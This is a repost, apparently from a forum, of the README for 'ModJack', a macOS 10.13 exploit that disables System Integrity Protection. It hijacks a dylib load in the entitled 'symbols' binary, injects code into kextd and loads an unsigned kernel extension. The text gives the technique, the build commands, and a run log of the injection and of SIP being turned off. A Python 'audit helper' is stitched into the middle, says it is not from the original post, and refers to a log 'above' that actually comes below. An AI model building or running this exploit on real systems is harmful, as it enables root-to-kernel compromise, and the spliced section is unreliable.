Nytro

macOS 10.13.x SIP bypass (kernel privilege escalation)

Works only on High Sierra, and requires root privilege. It can be chained with my previous local root exploits.

Slides

https://conference.hitb.org/hitbsecconf2019ams/materials/D2T2%20-%20ModJack%20-%20Hijacking%20the%20MacOS%20Kernel%20-%20Zhi%20Zhou.pdf

  • symbols has the com.apple.system-task-ports entitlement, so it can get the task port of kextd via task_for_pid (this requires root because kextd runs with euid 0)
  • Trigger a dylib hijack to load an evil payload into the symbols process, steal the entitlement and control kextd
  • kextd / kextutil / kextload are entitled with com.apple.rootless.kext-secure-management, which lets them send MKext requests to XNU to load a KEXT
  • All the validation is done in userland: code signature, root filesystem permission, User-Approved Kernel Extension Loading, KEXT staging. Just ask XNU to load our KEXT without a code signature
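The two preconditions the bullets rely on can be audited with a small standard-library script. This is an added example, not ModJack's code and not from the original post: it parses the entitlements plist that `codesign -d --entitlements :- <binary>` is assumed to print, and resolves the binary's `@rpath` / `@executable_path` dylib references (from `otool -L` and `otool -l` output) to see whether any of them lands outside SIP-protected locations. The plist and the otool text are constructed samples; the rpath string `@executable_path/Toolchains/XcodeDefault.xctoolchain/usr/lib` is my reading of the injected path in the run log, not something the page states, and the SIP prefix model is a rough approximation of rootless.conf.

```python
"""Audit helper for the two preconditions above: an entitled binary plus a
dylib load path outside SIP protection.  Added example, not ModJack code.
Standard library only; every input below is constructed."""
import plistlib
import posixpath
import re

# Entitlements the write-up names as relevant to controlling KEXT loading.
KEXT_ENTITLEMENTS = {
    "com.apple.system-task-ports",
    "com.apple.rootless.kext-secure-management",
}
# Rough model of rootless: these prefixes are SIP-protected, except the
# carve-outs listed as exempt (the real rules live in rootless.conf).
SIP_PROTECTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/")
SIP_EXEMPT_PREFIXES = ("/usr/local/",)

# Constructed: what `codesign -d --entitlements :- symbols` is assumed to
# print (the ':-' form strips the blob header, leaving plain XML).
SYMBOLS_ENTITLEMENTS = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
\t<key>com.apple.system-task-ports</key>
\t<true/>
</dict>
</plist>
"""
# Constructed `otool -L` output: symbols links libswiftDemangle via @rpath.
OTOOL_LIBS = """\
/usr/bin/symbols:
\t/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1252.250.1)
\t@rpath/libswiftDemangle.dylib (compatibility version 1.0.0, current version 1000.11.42)
"""
# Constructed `otool -l` fragment.  The rpath value is an assumption read
# off the injected path in the run log, not something the page states.
OTOOL_LOADCMDS = """\
Load command 14
          cmd LC_RPATH
      cmdsize 72
         path @executable_path/Toolchains/XcodeDefault.xctoolchain/usr/lib (offset 12)
"""


def kext_relevant_entitlements(plist_xml):
    """Subset of KEXT_ENTITLEMENTS that the plist grants (value is true)."""
    ents = plistlib.loads(plist_xml)
    return {k for k, v in ents.items() if v is True and k in KEXT_ENTITLEMENTS}


def parse_rpaths(loadcmds_text):
    """LC_RPATH search paths in load-command order (dyld tries them in order)."""
    rpaths, in_rpath = [], False
    for raw in loadcmds_text.splitlines():
        line = raw.strip()
        if line.startswith("cmd "):
            in_rpath = line == "cmd LC_RPATH"
        elif in_rpath:
            m = re.match(r"path (.+) \(offset \d+\)$", line)
            if m:
                rpaths.append(m.group(1))
    return rpaths


def parse_dylibs(libs_text):
    """Install names the binary links against, from `otool -L` output."""
    return re.findall(r"^\s+(\S+) \(compatibility version", libs_text, re.M)


def resolve_candidates(install_name, rpaths, exe_path):
    """Expand @rpath/@executable_path/@loader_path as dyld does for a main
    executable; returns every path dyld could pick, in search order."""
    exe_dir = posixpath.dirname(exe_path)

    def expand(p):
        p = p.replace("@executable_path", exe_dir).replace("@loader_path", exe_dir)
        return posixpath.normpath(p)

    if install_name.startswith("@rpath/"):
        tail = install_name[len("@rpath/"):]
        return [expand(posixpath.join(rp, tail)) for rp in rpaths]
    return [expand(install_name)]


def is_sip_protected(path):
    if path.startswith(SIP_EXEMPT_PREFIXES):
        return False
    return path.startswith(SIP_PROTECTED_PREFIXES)


def hijackable_loads(exe_path, libs_text, loadcmds_text):
    """(install_name, resolved_path) pairs outside SIP protection, i.e.
    places where whoever controls that directory can plant a dylib."""
    rpaths = parse_rpaths(loadcmds_text)
    return [(dep, cand)
            for dep in parse_dylibs(libs_text)
            for cand in resolve_candidates(dep, rpaths, exe_path)
            if not is_sip_protected(cand)]


if __name__ == "__main__":
    print("entitlements:", kext_relevant_entitlements(SYMBOLS_ENTITLEMENTS))
    # In place, every candidate sits under /usr: nothing to hijack.
    print("in place:", hijackable_loads("/usr/bin/symbols", OTOOL_LIBS, OTOOL_LOADCMDS))
    # Run from a copy (signature and entitlements travel with the file) and
    # the @executable_path rpath now points into the attacker's directory.
    copied = "/Users/test/Downloads/1/kernel/bin/symbols"
    print("copied:", hijackable_loads(copied, OTOOL_LIBS, OTOOL_LOADCMDS))
```

The interesting output is the second call: the same binary that is safe under /usr/bin resolves its `@rpath` dependency into a user-writable directory once it is executed from a copy, which is the shape of hijack the log above records (`inject .../kernel/bin/Toolchains/.../libswiftDemangle.dylib`). Feeding the script real `codesign`/`otool` output instead of the constructed samples is a one-line change at the call sites.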

Build

First, grab the dependencies

git submodule init
git submodule update

Install binutils

brew install binutils

Build Unrootless.kext

pushd 3rd-party/Unrootless-Kext ; xcodebuild ; popd

Build kernel exploit

pushd libinj ; make ; popd; pushd kernel ; make ; popd

Run

$ sudo ./kernel/bin/exp
Password:
2019-05-13 01:11:14.826 exp[666:7308] [LightYear] taytay pid: 668
2019-05-13 01:11:14.828 exp[666:7308] [LightYear] status: 0, pid 669
2019-05-13 01:11:14.892 symbols[669:7313] [LightYear] I am in symbols
2019-05-13 01:11:14.895 symbols[669:7313] [LightYear] inject /Users/test/Downloads/1/kernel/bin/Toolchains/XcodeDefault.xctoolchain/usr/lib/libswiftDemangle.dylib to kextd
get task port (OK)
allocate stack (OK)
remote stack 0x10714d000
allocate code (OK)
remote code 0x1041e7000
write loader code (OK)
mark code as eXecutable (OK)
mark stack as RW (OK)
write params (OK)
create remote thread (OK)
So it's gonna be forever

Then try to load any unsigned KEXT

$ csrutil status
System Integrity Protection status: enabled.
$ codesign -dvvv "./3rd-party/Unrootless-Kext/build/Release/Unrootless.kext"
./3rd-party/Unrootless-Kext/build/Release/Unrootless.kext: code object is not signed at all
$ sudo kextload 3rd-party/Unrootless-Kext/build/Release/Unrootless.kext
$ csrutil status
System Integrity Protection status: disabled.


Source: https://github.com/ChiChou/sploits/tree/master/ModJack
